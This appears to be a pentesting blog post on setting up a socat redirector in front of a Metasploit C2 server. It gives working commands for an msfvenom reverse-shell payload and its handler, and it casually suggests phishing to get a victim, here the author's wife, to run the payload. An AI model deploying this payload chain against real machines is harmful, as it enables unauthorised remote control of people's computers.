First steps in setting up a C2 environment. Using socat as a front to Metasploit. Command and Control my way. @c2_matrix @metasploit #pentest #pentesting #redteam #infosec

Hi, I know it has been a while since the last post, but life got in the way. But it is time now.

My goal in the coming posts is to set up different Command and Control systems and try them out.

Information about different C2s can be found on this fantastic site: https://www.thec2matrix.com/

So, as always, we start with a picture that we can talk about.

Command and Control setup

As you can see in the picture above, my plan is to use socat as a proxy in front of different C2 systems. I hope I can get all of the above working. I will do a separate post for every C2 system that I test.

So for this first post we will start with the socat server and the C2-1 server.

Short story first

  1. Get an IP for external access from your best friend (Thomas) who handles the network/firewall at work 🙂
  2. Install the socat server
  3. Install the C2-1 server
  4. Configure Metasploit
  5. Create a payload and run it on your wife’s computer
  6. Take over your wife’s computer

Install Socat server

We start easy with the installation of Ubuntu or any other Linux distribution of your choosing. I used Ubuntu 20.10. Then I installed socat with the following command:

sudo apt-get install socat

Then we can try out socat with this:

sudo socat TCP4-LISTEN:443,fork TCP4:invid.se:443

socat

What we do with the above command is use this server as a socat proxy for my company website. The site uses HTTPS, so the browser will show a certificate warning: socat only relays the TCP stream, it does not terminate TLS, so the certificate you receive belongs to the site behind the proxy and not to the socat server's IP that you typed in. The warning is expected; the point is simply to show that socat is working. Now browse to the socat server's IP (external or internal) and you will end up on the site or IP that you defined as the last argument in the command.

If you want to forward more than one port, that is also possible. One socat process handles one listening port, so start one process per port (here in the background with &, or use separate terminals):

sudo socat TCP4-LISTEN:443,fork TCP4:invid.se:443 &
sudo socat TCP4-LISTEN:80,fork TCP4:invid.se:80 &

socat with multiple ports

Now that we have a simple socat server up and running and have tested that it works, it is time to move on to the C2 server.

Install C2-1 server

The first C2 server we will install is a Kali machine, in my case a VM. I downloaded the latest version from https://cdimage.kali.org/kali-images/kali-weekly/ and did a standard installation.

When you have the machine up and running, we start by setting up Metasploit with the commands below:

sudo msfdb init
msfdb start
msfconsole -q    # -q skips the banner; leave it out if you want the banner

msfconsole

We have now installed a Kali machine and configured Metasploit on it.

Now it is time to try this simple C2 server with a payload that I email to my wife!

First we start with socat. We bind port 443 on the socat server and forward it to the C2-1 server on port 443:

sudo socat TCP4-LISTEN:443,fork TCP4:172.21.21.38:443

socat to c2-1

The socat server is reachable from the internet; when I hit its external IP on port 443, the connection is forwarded to the C2-1 server. Nothing is listening on any other port, so connections to other ports are not relayed anywhere.

Now that we have connected socat to the C2-1 server, it is time to create a payload. We use msfvenom for this. Because the C2-1 server is Kali, msfvenom is already installed, so I used that machine to create the payload.

LHOST = the external IP of the socat server (your IP, not mine)
LPORT = the port that socat forwards to your C2-1 server (443)

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=191.242.411.17 LPORT=443 -f elf > 1.elf

We now have an executable for the Linux machine that we want to take over.

It is time to set up our C2 server, in this case Metasploit.

If you have not started Metasploit yet, do it now.

Then we run a few commands to start the handler. LPORT is 443 and LHOST is the local IP of the C2-1 server. Note the difference from the payload: the payload carries the socat server's external IP because that is where the victim connects, while the handler listens on the C2-1 server's own address, which is where socat delivers the connection.

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LPORT 443
set LHOST 172.21.21.38
exploit

metasploit running

So now we have finally set up the environment; all that is left is to reach this C2 with the payload that we created.
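The same handler setup as one Metasploit resource script, so it can be started with `msfconsole -q -r handler.rc` instead of typing the commands each time. This is an added example and not part of the original post; the addresses are the post's own placeholders. It adds two settings the interactive steps above do not use: `ExitOnSession false` keeps the listener up after the first session instead of exiting, and `exploit -j -z` runs the handler as a background job so the console stays usable while it waits.

```text
# handler.rc (added example; IPs are the post's placeholders)
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 172.21.21.38
set LPORT 443
set ExitOnSession false
exploit -j -z
```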

We have now the big issue left: how do I get my wife to run this file?
Phishing?
A fake website?
Or just tell her to run it?

I did go for the last one in this case.

Run the command please….

After she ran it, I got this on the C2-1 server:

We have the machine in our hands now!

We also have shell!

We have now tried the first C2 installation, Metasploit behind socat.

Now we move on to part 2.

Keep hacking!

//Roger
